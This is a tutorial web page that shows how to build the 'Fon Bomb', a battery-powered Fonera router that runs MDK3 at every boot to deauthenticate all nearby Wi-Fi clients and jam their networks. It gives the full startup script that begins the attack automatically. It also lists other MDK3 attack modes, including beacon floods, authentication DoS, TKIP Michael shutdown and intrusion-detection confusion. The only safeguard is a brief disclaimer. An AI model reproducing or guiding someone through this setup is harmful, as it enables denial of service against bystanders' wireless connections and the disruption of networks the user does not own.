Home arrow Tutorials and Guides arrow Wireless Jammer
The "Fon Bomb" Wireless Jammer PDF Print E-mail
Sunday, 06 April 2008

"Fon Bomb" Portable Wireless Jammer

This device works by deauthenticating wireless clients from their AP's, which essentially can turn it into a wireless jammer since nobody can get connected. 

The hardware consists of a Fonera flashed with Legend pre4.5 stable.  It also uses the battery pack listed on this website which allows it be to mobile.  MDK3 in deauthentication mode is what actually performs the attacks on the software side.

The attack starts when the Fonera is turned on.   It will then automatically create the "ath1" interface in monitor mode.  Then the Fonera will start MDK3 in deauthentication mode as a background process.  Now the Fonera will look for clients to disconnect who are in range.  The attack will end when I turn the Fonera off, which allows the disconnect clients to finally reconnect to their APs.  

Visit the forums to discuss this guide

NOTE:  This attack may not work against all wireless devices.  Also, the knowledge contained within this guide should not be used for potentionally malice acts.  Perform these actions at your own risk.

 

Basically, by editing the /etc/init.d/custom-user-startup file, we can pass commands for the Fonera to run at startup.   Here's what it looks like after the hack commands were added:

#!/bin/sh /etc/rc.common
START=90
wlanconfig ath1 create wlanmode monitor wlandev wifi0
mdk3 ath1 d &

# place your own startup commands here
#
# REMEMBER: You *MUST* place an '&' after launching programs you
#   that are to continue running in the background.
#
#   i.e.
#   BAD:  upnpd
#   GOOD: upnpd &
#
# Failure to do this will result in the startup process halting
# on this file and the diagnostic light remaining on (at least
# for WRT54G(s) models).

 

The first command creates the ath1 interface in monitor mode.  The second command tells MDK3 to start in deauthentication mode and to run in the backbround, designated by the "&".

You are not limited to the types of tests you can run.  The above is just a demonstration of what you could do.  Here are all of the available test modes:

TEST MODES:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too much clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - BRAND NEW MAC FILTER BRUTEFORCE MODE
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
 

Run "mdk3 --fullhelp" for detailed information about each of the modes.   You could modify the command in /etc/init.d/custom-user-startup to suit what type of test you would like to run.  Also, you can pass options to the deauthentication test to specify which APs to test against, what packet rate, etc.  See "mdk3 --fullhelp" for detailed information.

Visit the forums to discuss this guide

 
< Prev   Next >
[ Back ]